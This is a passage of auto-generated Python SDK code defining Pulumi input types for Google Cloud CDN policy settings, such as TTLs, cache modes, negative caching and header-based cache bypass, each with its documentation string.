ttl: Optional[pulumi.Input[int]] = None):
"""
Specify CDN TTLs for response error codes.
:param pulumi.Input[int] code: The HTTP status code to define a TTL against. Only HTTP status codes 300, 301, 302, 307, 308, 404, 405, 410, 421, 451 and 501 are can be specified as values, and you cannot specify a status code more than once.
:param pulumi.Input[int] ttl: The TTL (in seconds) for which to cache responses with the corresponding status code. The maximum allowed value is 1800s (30 minutes), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
if code is not None:
pulumi.set(__self__, "code", code)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def code(self) -> Optional[pulumi.Input[int]]:
"""
The HTTP status code to define a TTL against. Only HTTP status codes 300, 301, 302, 307, 308, 404, 405, 410, 421, 451 and 501 are can be specified as values, and you cannot specify a status code more than once.
"""
return pulumi.get(self, "code")
@code.setter
def code(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "code", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
The TTL (in seconds) for which to cache responses with the corresponding status code. The maximum allowed value is 1800s (30 minutes), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class BackendBucketCdnPolicyArgs:
def __init__(__self__, *,
bypass_cache_on_request_headers: Optional[pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyBypassCacheOnRequestHeaderArgs']]]] = None,
cache_key_policy: Optional[pulumi.Input['BackendBucketCdnPolicyCacheKeyPolicyArgs']] = None,
cache_mode: Optional[pulumi.Input['BackendBucketCdnPolicyCacheMode']] = None,
client_ttl: Optional[pulumi.Input[int]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
max_ttl: Optional[pulumi.Input[int]] = None,
negative_caching: Optional[pulumi.Input[bool]] = None,
negative_caching_policy: Optional[pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyNegativeCachingPolicyArgs']]]] = None,
request_coalescing: Optional[pulumi.Input[bool]] = None,
serve_while_stale: Optional[pulumi.Input[int]] = None,
signed_url_cache_max_age_sec: Optional[pulumi.Input[str]] = None):
"""
Message containing Cloud CDN configuration for a backend bucket.
:param pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyBypassCacheOnRequestHeaderArgs']]] bypass_cache_on_request_headers: Bypass the cache when the specified request headers are matched - e.g. Pragma or Authorization headers. Up to 5 headers can be specified. The cache is bypassed for all cdnPolicy.cacheMode settings.
:param pulumi.Input['BackendBucketCdnPolicyCacheKeyPolicyArgs'] cache_key_policy: The CacheKeyPolicy for this CdnPolicy.
:param pulumi.Input['BackendBucketCdnPolicyCacheMode'] cache_mode: Specifies the cache setting for all responses from this backend. The possible values are: USE_ORIGIN_HEADERS Requires the origin to set valid caching headers to cache content. Responses without these headers will not be cached at Google's edge, and will require a full trip to the origin on every request, potentially impacting performance and increasing load on the origin server. FORCE_CACHE_ALL Cache all content, ignoring any "private", "no-store" or "no-cache" directives in Cache-Control response headers. Warning: this may result in Cloud CDN caching private, per-user (user identifiable) content. CACHE_ALL_STATIC Automatically cache static content, including common image formats, media (video and audio), and web assets (JavaScript and CSS). Requests and responses that are marked as uncacheable, as well as dynamic content (including HTML), will not be cached.
:param pulumi.Input[int] client_ttl: Specifies a separate client (e.g. browser client) maximum TTL. This is used to clamp the max-age (or Expires) value sent to the client. With FORCE_CACHE_ALL, the lesser of client_ttl and default_ttl is used for the response max-age directive, along with a "public" directive. For cacheable content in CACHE_ALL_STATIC mode, client_ttl clamps the max-age from the origin (if specified), or else sets the response max-age directive to the lesser of the client_ttl and default_ttl, and also ensures a "public" cache-control directive is present. If a client TTL is not specified, a default value (1 hour) will be used. The maximum allowed value is 31,622,400s (1 year).
:param pulumi.Input[int] default_ttl: Specifies the default TTL for cached content served by this origin for responses that do not have an existing valid TTL (max-age or s-max-age). Setting a TTL of "0" means "always revalidate". The value of defaultTTL cannot be set to a value greater than that of maxTTL, but can be equal. When the cacheMode is set to FORCE_CACHE_ALL, the defaultTTL will overwrite the TTL set in all responses. The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
:param pulumi.Input[int] max_ttl: Specifies the maximum allowed TTL for cached content served by this origin. Cache directives that attempt to set a max-age or s-maxage higher than this, or an Expires header more than maxTTL seconds in the future will be capped at the value of maxTTL, as if it were the value of an s-maxage Cache-Control directive. Headers sent to the client will not be modified. Setting a TTL of "0" means "always revalidate". The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
:param pulumi.Input[bool] negative_caching: Negative caching allows per-status code TTLs to be set, in order to apply fine-grained caching for common errors or redirects. This can reduce the load on your origin and improve end-user experience by reducing response latency. When the cache mode is set to CACHE_ALL_STATIC or USE_ORIGIN_HEADERS, negative caching applies to responses with the specified response code that lack any Cache-Control, Expires, or Pragma: no-cache directives. When the cache mode is set to FORCE_CACHE_ALL, negative caching applies to all responses with the specified response code, and override any caching headers. By default, Cloud CDN will apply the following default TTLs to these status codes: HTTP 300 (Multiple Choice), 301, 308 (Permanent Redirects): 10m HTTP 404 (Not Found), 410 (Gone), 451 (Unavailable For Legal Reasons): 120s HTTP 405 (Method Not Found), 421 (Misdirected Request), 501 (Not Implemented): 60s. These defaults can be overridden in negative_caching_policy.
:param pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyNegativeCachingPolicyArgs']]] negative_caching_policy: Sets a cache TTL for the specified HTTP status code. negative_caching must be enabled to configure negative_caching_policy. Omitting the policy and leaving negative_caching enabled will use Cloud CDN's default cache TTLs. Note that when specifying an explicit negative_caching_policy, you should take care to specify a cache TTL for all response codes that you wish to cache. Cloud CDN will not apply any default negative caching when a policy exists.
:param pulumi.Input[bool] request_coalescing: If true then Cloud CDN will combine multiple concurrent cache fill requests into a small number of requests to the origin.
:param pulumi.Input[int] serve_while_stale: Serve existing content from the cache (if available) when revalidating content with the origin, or when an error is encountered when refreshing the cache. This setting defines the default "max-stale" duration for any cached responses that do not specify a max-stale directive. Stale responses that exceed the TTL configured here will not be served. The default limit (max-stale) is 86400s (1 day), which will allow stale content to be served up to this limit beyond the max-age (or s-max-age) of a cached response. The maximum allowed value is 604800 (1 week). Set this to zero (0) to disable serve-while-stale.
:param pulumi.Input[str] signed_url_cache_max_age_sec: Maximum number of seconds the response to a signed URL request will be considered fresh. After this time period, the response will be revalidated before being served. Defaults to 1hr (3600s). When serving responses to signed URL requests, Cloud CDN will internally behave as though all responses from this backend had a "Cache-Control: public, max-age=[TTL]" header, regardless of any existing Cache-Control header. The actual headers served in responses will not be altered.
"""
if bypass_cache_on_request_headers is not None:
pulumi.set(__self__, "bypass_cache_on_request_headers", bypass_cache_on_request_headers)
if cache_key_policy is not None:
pulumi.set(__self__, "cache_key_policy", cache_key_policy)
if cache_mode is not None:
pulumi.set(__self__, "cache_mode", cache_mode)
if client_ttl is not None:
pulumi.set(__self__, "client_ttl", client_ttl)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if max_ttl is not None:
pulumi.set(__self__, "max_ttl", max_ttl)
if negative_caching is not None:
pulumi.set(__self__, "negative_caching", negative_caching)
if negative_caching_policy is not None:
pulumi.set(__self__, "negative_caching_policy", negative_caching_policy)
if request_coalescing is not None:
pulumi.set(__self__, "request_coalescing", request_coalescing)
if serve_while_stale is not None:
pulumi.set(__self__, "serve_while_stale", serve_while_stale)
if signed_url_cache_max_age_sec is not None:
pulumi.set(__self__, "signed_url_cache_max_age_sec", signed_url_cache_max_age_sec)
@property
@pulumi.getter(name="bypassCacheOnRequestHeaders")
def bypass_cache_on_request_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyBypassCacheOnRequestHeaderArgs']]]]:
"""
Bypass the cache when the specified request headers are matched - e.g. Pragma or Authorization headers. Up to 5 headers can be specified. The cache is bypassed for all cdnPolicy.cacheMode settings.
"""
return pulumi.get(self, "bypass_cache_on_request_headers")
@bypass_cache_on_request_headers.setter
def bypass_cache_on_request_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyBypassCacheOnRequestHeaderArgs']]]]):
pulumi.set(self, "bypass_cache_on_request_headers", value)
@property
@pulumi.getter(name="cacheKeyPolicy")
def cache_key_policy(self) -> Optional[pulumi.Input['BackendBucketCdnPolicyCacheKeyPolicyArgs']]:
"""
The CacheKeyPolicy for this CdnPolicy.
"""
return pulumi.get(self, "cache_key_policy")
@cache_key_policy.setter
def cache_key_policy(self, value: Optional[pulumi.Input['BackendBucketCdnPolicyCacheKeyPolicyArgs']]):
pulumi.set(self, "cache_key_policy", value)
@property
@pulumi.getter(name="cacheMode")
def cache_mode(self) -> Optional[pulumi.Input['BackendBucketCdnPolicyCacheMode']]:
"""
Specifies the cache setting for all responses from this backend. The possible values are: USE_ORIGIN_HEADERS Requires the origin to set valid caching headers to cache content. Responses without these headers will not be cached at Google's edge, and will require a full trip to the origin on every request, potentially impacting performance and increasing load on the origin server. FORCE_CACHE_ALL Cache all content, ignoring any "private", "no-store" or "no-cache" directives in Cache-Control response headers. Warning: this may result in Cloud CDN caching private, per-user (user identifiable) content. CACHE_ALL_STATIC Automatically cache static content, including common image formats, media (video and audio), and web assets (JavaScript and CSS). Requests and responses that are marked as uncacheable, as well as dynamic content (including HTML), will not be cached.
"""
return pulumi.get(self, "cache_mode")
@cache_mode.setter
def cache_mode(self, value: Optional[pulumi.Input['BackendBucketCdnPolicyCacheMode']]):
pulumi.set(self, "cache_mode", value)
@property
@pulumi.getter(name="clientTtl")
def client_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Specifies a separate client (e.g. browser client) maximum TTL. This is used to clamp the max-age (or Expires) value sent to the client. With FORCE_CACHE_ALL, the lesser of client_ttl and default_ttl is used for the response max-age directive, along with a "public" directive. For cacheable content in CACHE_ALL_STATIC mode, client_ttl clamps the max-age from the origin (if specified), or else sets the response max-age directive to the lesser of the client_ttl and default_ttl, and also ensures a "public" cache-control directive is present. If a client TTL is not specified, a default value (1 hour) will be used. The maximum allowed value is 31,622,400s (1 year).
"""
return pulumi.get(self, "client_ttl")
@client_ttl.setter
def client_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "client_ttl", value)
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the default TTL for cached content served by this origin for responses that do not have an existing valid TTL (max-age or s-max-age). Setting a TTL of "0" means "always revalidate". The value of defaultTTL cannot be set to a value greater than that of maxTTL, but can be equal. When the cacheMode is set to FORCE_CACHE_ALL, the defaultTTL will overwrite the TTL set in all responses. The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="maxTtl")
def max_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum allowed TTL for cached content served by this origin. Cache directives that attempt to set a max-age or s-maxage higher than this, or an Expires header more than maxTTL seconds in the future will be capped at the value of maxTTL, as if it were the value of an s-maxage Cache-Control directive. Headers sent to the client will not be modified. Setting a TTL of "0" means "always revalidate". The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
return pulumi.get(self, "max_ttl")
@max_ttl.setter
def max_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_ttl", value)
@property
@pulumi.getter(name="negativeCaching")
def negative_caching(self) -> Optional[pulumi.Input[bool]]:
"""
Negative caching allows per-status code TTLs to be set, in order to apply fine-grained caching for common errors or redirects. This can reduce the load on your origin and improve end-user experience by reducing response latency. When the cache mode is set to CACHE_ALL_STATIC or USE_ORIGIN_HEADERS, negative caching applies to responses with the specified response code that lack any Cache-Control, Expires, or Pragma: no-cache directives. When the cache mode is set to FORCE_CACHE_ALL, negative caching applies to all responses with the specified response code, and override any caching headers. By default, Cloud CDN will apply the following default TTLs to these status codes: HTTP 300 (Multiple Choice), 301, 308 (Permanent Redirects): 10m HTTP 404 (Not Found), 410 (Gone), 451 (Unavailable For Legal Reasons): 120s HTTP 405 (Method Not Found), 421 (Misdirected Request), 501 (Not Implemented): 60s. These defaults can be overridden in negative_caching_policy.
"""
return pulumi.get(self, "negative_caching")
@negative_caching.setter
def negative_caching(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "negative_caching", value)
@property
@pulumi.getter(name="negativeCachingPolicy")
def negative_caching_policy(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyNegativeCachingPolicyArgs']]]]:
"""
Sets a cache TTL for the specified HTTP status code. negative_caching must be enabled to configure negative_caching_policy. Omitting the policy and leaving negative_caching enabled will use Cloud CDN's default cache TTLs. Note that when specifying an explicit negative_caching_policy, you should take care to specify a cache TTL for all response codes that you wish to cache. Cloud CDN will not apply any default negative caching when a policy exists.
"""
return pulumi.get(self, "negative_caching_policy")
@negative_caching_policy.setter
def negative_caching_policy(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BackendBucketCdnPolicyNegativeCachingPolicyArgs']]]]):
pulumi.set(self, "negative_caching_policy", value)
@property
@pulumi.getter(name="requestCoalescing")
def request_coalescing(self) -> Optional[pulumi.Input[bool]]:
"""
If true then Cloud CDN will combine multiple concurrent cache fill requests into a small number of requests to the origin.
"""
return pulumi.get(self, "request_coalescing")
@request_coalescing.setter
def request_coalescing(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "request_coalescing", value)
@property
@pulumi.getter(name="serveWhileStale")
def serve_while_stale(self) -> Optional[pulumi.Input[int]]:
"""
Serve existing content from the cache (if available) when revalidating content with the origin, or when an error is encountered when refreshing the cache. This setting defines the default "max-stale" duration for any cached responses that do not specify a max-stale directive. Stale responses that exceed the TTL configured here will not be served. The default limit (max-stale) is 86400s (1 day), which will allow stale content to be served up to this limit beyond the max-age (or s-max-age) of a cached response. The maximum allowed value is 604800 (1 week). Set this to zero (0) to disable serve-while-stale.
"""
return pulumi.get(self, "serve_while_stale")
@serve_while_stale.setter
def serve_while_stale(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "serve_while_stale", value)
@property
@pulumi.getter(name="signedUrlCacheMaxAgeSec")
def signed_url_cache_max_age_sec(self) -> Optional[pulumi.Input[str]]:
"""
Maximum number of seconds the response to a signed URL request will be considered fresh. After this time period, the response will be revalidated before being served. Defaults to 1hr (3600s). When serving responses to signed URL requests, Cloud CDN will internally behave as though all responses from this backend had a "Cache-Control: public, max-age=[TTL]" header, regardless of any existing Cache-Control header. The actual headers served in responses will not be altered.
"""
return pulumi.get(self, "signed_url_cache_max_age_sec")
@signed_url_cache_max_age_sec.setter
def signed_url_cache_max_age_sec(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "signed_url_cache_max_age_sec", value)
@pulumi.input_type
class BackendServiceCdnPolicyBypassCacheOnRequestHeaderArgs:
def __init__(__self__, *,
header_name: Optional[pulumi.Input[str]] = None):
"""
Bypass the cache when the specified request headers are present, e.g. Pragma or Authorization headers. Values are case insensitive. The presence of such a header overrides the cache_mode setting.
:param pulumi.Input[str] header_name: The header field name to match on when bypassing cache. Values are case-insensitive.
"""
if header_name is not None:
pulumi.set(__self__, "header_name", header_name)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> Optional[pulumi.Input[str]]:
"""
The header field name to match on when bypassing cache. Values are case-insensitive.
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "header_name", value)
@pulumi.input_type
class BackendServiceCdnPolicyNegativeCachingPolicyArgs:
def __init__(__self__, *,
code: Optional[pulumi.Input[int]] = None,
ttl: Optional[pulumi.Input[int]] = None):
"""
Specify CDN TTLs for response error codes.
:param pulumi.Input[int] code: The HTTP status code to define a TTL against. Only HTTP status codes 300, 301, 302, 307, 308, 404, 405, 410, 421, 451 and 501 are can be specified as values, and you cannot specify a status code more than once.
:param pulumi.Input[int] ttl: The TTL (in seconds) for which to cache responses with the corresponding status code. The maximum allowed value is 1800s (30 minutes), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
if code is not None:
pulumi.set(__self__, "code", code)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def code(self) -> Optional[pulumi.Input[int]]:
"""
The HTTP status code to define a TTL against. Only HTTP status codes 300, 301, 302, 307, 308, 404, 405, 410, 421, 451 and 501 are can be specified as values, and you cannot specify a status code more than once.
"""
return pulumi.get(self, "code")
@code.setter
def code(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "code", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input[int]]:
"""
The TTL (in seconds) for which to cache responses with the corresponding status code. The maximum allowed value is 1800s (30 minutes), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class BackendServiceCdnPolicyArgs:
def __init__(__self__, *,
bypass_cache_on_request_headers: Optional[pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyBypassCacheOnRequestHeaderArgs']]]] = None,
cache_key_policy: Optional[pulumi.Input['CacheKeyPolicyArgs']] = None,
cache_mode: Optional[pulumi.Input['BackendServiceCdnPolicyCacheMode']] = None,
client_ttl: Optional[pulumi.Input[int]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
max_ttl: Optional[pulumi.Input[int]] = None,
negative_caching: Optional[pulumi.Input[bool]] = None,
negative_caching_policy: Optional[pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyNegativeCachingPolicyArgs']]]] = None,
request_coalescing: Optional[pulumi.Input[bool]] = None,
serve_while_stale: Optional[pulumi.Input[int]] = None,
signed_url_cache_max_age_sec: Optional[pulumi.Input[str]] = None):
"""
Message containing Cloud CDN configuration for a backend service.
:param pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyBypassCacheOnRequestHeaderArgs']]] bypass_cache_on_request_headers: Bypass the cache when the specified request headers are matched - e.g. Pragma or Authorization headers. Up to 5 headers can be specified. The cache is bypassed for all cdnPolicy.cacheMode settings.
:param pulumi.Input['CacheKeyPolicyArgs'] cache_key_policy: The CacheKeyPolicy for this CdnPolicy.
:param pulumi.Input['BackendServiceCdnPolicyCacheMode'] cache_mode: Specifies the cache setting for all responses from this backend. The possible values are: USE_ORIGIN_HEADERS Requires the origin to set valid caching headers to cache content. Responses without these headers will not be cached at Google's edge, and will require a full trip to the origin on every request, potentially impacting performance and increasing load on the origin server. FORCE_CACHE_ALL Cache all content, ignoring any "private", "no-store" or "no-cache" directives in Cache-Control response headers. Warning: this may result in Cloud CDN caching private, per-user (user identifiable) content. CACHE_ALL_STATIC Automatically cache static content, including common image formats, media (video and audio), and web assets (JavaScript and CSS). Requests and responses that are marked as uncacheable, as well as dynamic content (including HTML), will not be cached.
:param pulumi.Input[int] client_ttl: Specifies a separate client (e.g. browser client) maximum TTL. This is used to clamp the max-age (or Expires) value sent to the client. With FORCE_CACHE_ALL, the lesser of client_ttl and default_ttl is used for the response max-age directive, along with a "public" directive. For cacheable content in CACHE_ALL_STATIC mode, client_ttl clamps the max-age from the origin (if specified), or else sets the response max-age directive to the lesser of the client_ttl and default_ttl, and also ensures a "public" cache-control directive is present. If a client TTL is not specified, a default value (1 hour) will be used. The maximum allowed value is 31,622,400s (1 year).
:param pulumi.Input[int] default_ttl: Specifies the default TTL for cached content served by this origin for responses that do not have an existing valid TTL (max-age or s-max-age). Setting a TTL of "0" means "always revalidate". The value of defaultTTL cannot be set to a value greater than that of maxTTL, but can be equal. When the cacheMode is set to FORCE_CACHE_ALL, the defaultTTL will overwrite the TTL set in all responses. The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
:param pulumi.Input[int] max_ttl: Specifies the maximum allowed TTL for cached content served by this origin. Cache directives that attempt to set a max-age or s-maxage higher than this, or an Expires header more than maxTTL seconds in the future will be capped at the value of maxTTL, as if it were the value of an s-maxage Cache-Control directive. Headers sent to the client will not be modified. Setting a TTL of "0" means "always revalidate". The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
:param pulumi.Input[bool] negative_caching: Negative caching allows per-status code TTLs to be set, in order to apply fine-grained caching for common errors or redirects. This can reduce the load on your origin and improve end-user experience by reducing response latency. When the cache mode is set to CACHE_ALL_STATIC or USE_ORIGIN_HEADERS, negative caching applies to responses with the specified response code that lack any Cache-Control, Expires, or Pragma: no-cache directives. When the cache mode is set to FORCE_CACHE_ALL, negative caching applies to all responses with the specified response code, and override any caching headers. By default, Cloud CDN will apply the following default TTLs to these status codes: HTTP 300 (Multiple Choice), 301, 308 (Permanent Redirects): 10m HTTP 404 (Not Found), 410 (Gone), 451 (Unavailable For Legal Reasons): 120s HTTP 405 (Method Not Found), 421 (Misdirected Request), 501 (Not Implemented): 60s. These defaults can be overridden in negative_caching_policy.
:param pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyNegativeCachingPolicyArgs']]] negative_caching_policy: Sets a cache TTL for the specified HTTP status code. negative_caching must be enabled to configure negative_caching_policy. Omitting the policy and leaving negative_caching enabled will use Cloud CDN's default cache TTLs. Note that when specifying an explicit negative_caching_policy, you should take care to specify a cache TTL for all response codes that you wish to cache. Cloud CDN will not apply any default negative caching when a policy exists.
:param pulumi.Input[bool] request_coalescing: If true then Cloud CDN will combine multiple concurrent cache fill requests into a small number of requests to the origin.
:param pulumi.Input[int] serve_while_stale: Serve existing content from the cache (if available) when revalidating content with the origin, or when an error is encountered when refreshing the cache. This setting defines the default "max-stale" duration for any cached responses that do not specify a max-stale directive. Stale responses that exceed the TTL configured here will not be served. The default limit (max-stale) is 86400s (1 day), which will allow stale content to be served up to this limit beyond the max-age (or s-max-age) of a cached response. The maximum allowed value is 604800 (1 week). Set this to zero (0) to disable serve-while-stale.
:param pulumi.Input[str] signed_url_cache_max_age_sec: Maximum number of seconds the response to a signed URL request will be considered fresh. After this time period, the response will be revalidated before being served. Defaults to 1hr (3600s). When serving responses to signed URL requests, Cloud CDN will internally behave as though all responses from this backend had a "Cache-Control: public, max-age=[TTL]" header, regardless of any existing Cache-Control header. The actual headers served in responses will not be altered.
"""
if bypass_cache_on_request_headers is not None:
pulumi.set(__self__, "bypass_cache_on_request_headers", bypass_cache_on_request_headers)
if cache_key_policy is not None:
pulumi.set(__self__, "cache_key_policy", cache_key_policy)
if cache_mode is not None:
pulumi.set(__self__, "cache_mode", cache_mode)
if client_ttl is not None:
pulumi.set(__self__, "client_ttl", client_ttl)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if max_ttl is not None:
pulumi.set(__self__, "max_ttl", max_ttl)
if negative_caching is not None:
pulumi.set(__self__, "negative_caching", negative_caching)
if negative_caching_policy is not None:
pulumi.set(__self__, "negative_caching_policy", negative_caching_policy)
if request_coalescing is not None:
pulumi.set(__self__, "request_coalescing", request_coalescing)
if serve_while_stale is not None:
pulumi.set(__self__, "serve_while_stale", serve_while_stale)
if signed_url_cache_max_age_sec is not None:
pulumi.set(__self__, "signed_url_cache_max_age_sec", signed_url_cache_max_age_sec)
@property
@pulumi.getter(name="bypassCacheOnRequestHeaders")
def bypass_cache_on_request_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyBypassCacheOnRequestHeaderArgs']]]]:
"""
Bypass the cache when the specified request headers are matched - e.g. Pragma or Authorization headers. Up to 5 headers can be specified. The cache is bypassed for all cdnPolicy.cacheMode settings.
"""
return pulumi.get(self, "bypass_cache_on_request_headers")
@bypass_cache_on_request_headers.setter
def bypass_cache_on_request_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyBypassCacheOnRequestHeaderArgs']]]]):
pulumi.set(self, "bypass_cache_on_request_headers", value)
@property
@pulumi.getter(name="cacheKeyPolicy")
def cache_key_policy(self) -> Optional[pulumi.Input['CacheKeyPolicyArgs']]:
"""
The CacheKeyPolicy for this CdnPolicy.
"""
return pulumi.get(self, "cache_key_policy")
@cache_key_policy.setter
def cache_key_policy(self, value: Optional[pulumi.Input['CacheKeyPolicyArgs']]):
pulumi.set(self, "cache_key_policy", value)
@property
@pulumi.getter(name="cacheMode")
def cache_mode(self) -> Optional[pulumi.Input['BackendServiceCdnPolicyCacheMode']]:
"""
Specifies the cache setting for all responses from this backend. The possible values are: USE_ORIGIN_HEADERS Requires the origin to set valid caching headers to cache content. Responses without these headers will not be cached at Google's edge, and will require a full trip to the origin on every request, potentially impacting performance and increasing load on the origin server. FORCE_CACHE_ALL Cache all content, ignoring any "private", "no-store" or "no-cache" directives in Cache-Control response headers. Warning: this may result in Cloud CDN caching private, per-user (user identifiable) content. CACHE_ALL_STATIC Automatically cache static content, including common image formats, media (video and audio), and web assets (JavaScript and CSS). Requests and responses that are marked as uncacheable, as well as dynamic content (including HTML), will not be cached.
"""
return pulumi.get(self, "cache_mode")
@cache_mode.setter
def cache_mode(self, value: Optional[pulumi.Input['BackendServiceCdnPolicyCacheMode']]):
pulumi.set(self, "cache_mode", value)
@property
@pulumi.getter(name="clientTtl")
def client_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Specifies a separate client (e.g. browser client) maximum TTL. This is used to clamp the max-age (or Expires) value sent to the client. With FORCE_CACHE_ALL, the lesser of client_ttl and default_ttl is used for the response max-age directive, along with a "public" directive. For cacheable content in CACHE_ALL_STATIC mode, client_ttl clamps the max-age from the origin (if specified), or else sets the response max-age directive to the lesser of the client_ttl and default_ttl, and also ensures a "public" cache-control directive is present. If a client TTL is not specified, a default value (1 hour) will be used. The maximum allowed value is 31,622,400s (1 year).
"""
return pulumi.get(self, "client_ttl")
@client_ttl.setter
def client_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "client_ttl", value)
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the default TTL for cached content served by this origin for responses that do not have an existing valid TTL (max-age or s-max-age). Setting a TTL of "0" means "always revalidate". The value of defaultTTL cannot be set to a value greater than that of maxTTL, but can be equal. When the cacheMode is set to FORCE_CACHE_ALL, the defaultTTL will overwrite the TTL set in all responses. The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="maxTtl")
def max_ttl(self) -> Optional[pulumi.Input[int]]:
"""
Specifies the maximum allowed TTL for cached content served by this origin. Cache directives that attempt to set a max-age or s-maxage higher than this, or an Expires header more than maxTTL seconds in the future will be capped at the value of maxTTL, as if it were the value of an s-maxage Cache-Control directive. Headers sent to the client will not be modified. Setting a TTL of "0" means "always revalidate". The maximum allowed value is 31,622,400s (1 year), noting that infrequently accessed objects may be evicted from the cache before the defined TTL.
"""
return pulumi.get(self, "max_ttl")
@max_ttl.setter
def max_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_ttl", value)
@property
@pulumi.getter(name="negativeCaching")
def negative_caching(self) -> Optional[pulumi.Input[bool]]:
"""
Negative caching allows per-status code TTLs to be set, in order to apply fine-grained caching for common errors or redirects. This can reduce the load on your origin and improve end-user experience by reducing response latency. When the cache mode is set to CACHE_ALL_STATIC or USE_ORIGIN_HEADERS, negative caching applies to responses with the specified response code that lack any Cache-Control, Expires, or Pragma: no-cache directives. When the cache mode is set to FORCE_CACHE_ALL, negative caching applies to all responses with the specified response code, and override any caching headers. By default, Cloud CDN will apply the following default TTLs to these status codes: HTTP 300 (Multiple Choice), 301, 308 (Permanent Redirects): 10m HTTP 404 (Not Found), 410 (Gone), 451 (Unavailable For Legal Reasons): 120s HTTP 405 (Method Not Found), 421 (Misdirected Request), 501 (Not Implemented): 60s. These defaults can be overridden in negative_caching_policy.
"""
return pulumi.get(self, "negative_caching")
@negative_caching.setter
def negative_caching(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "negative_caching", value)
@property
@pulumi.getter(name="negativeCachingPolicy")
def negative_caching_policy(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyNegativeCachingPolicyArgs']]]]:
"""
Sets a cache TTL for the specified HTTP status code. negative_caching must be enabled to configure negative_caching_policy. Omitting the policy and leaving negative_caching enabled will use Cloud CDN's default cache TTLs. Note that when specifying an explicit negative_caching_policy, you should take care to specify a cache TTL for all response codes that you wish to cache. Cloud CDN will not apply any default negative caching when a policy exists.
"""
return pulumi.get(self, "negative_caching_policy")
@negative_caching_policy.setter
def negative_caching_policy(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['BackendServiceCdnPolicyNegativeCachingPolicyArgs']]]]):
pulumi.set(self, "negative_caching_policy", value)
@property
@pulumi.getter(name="requestCoalescing")
def request_coalescing(self) -> Optional[pulumi.Input[bool]]:
"""
If true then Cloud CDN will combine multiple concurrent cache fill requests into a small number of requests to the origin.
"""
return pulumi.get(self, "request_coalescing")
@request_coalescing.setter
def request_coalescing(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "request_coalescing", value)
@property
@pulumi.getter(name="serveWhileStale")
def serve_while_stale(self) -> Optional[pulumi.Input[int]]:
"""
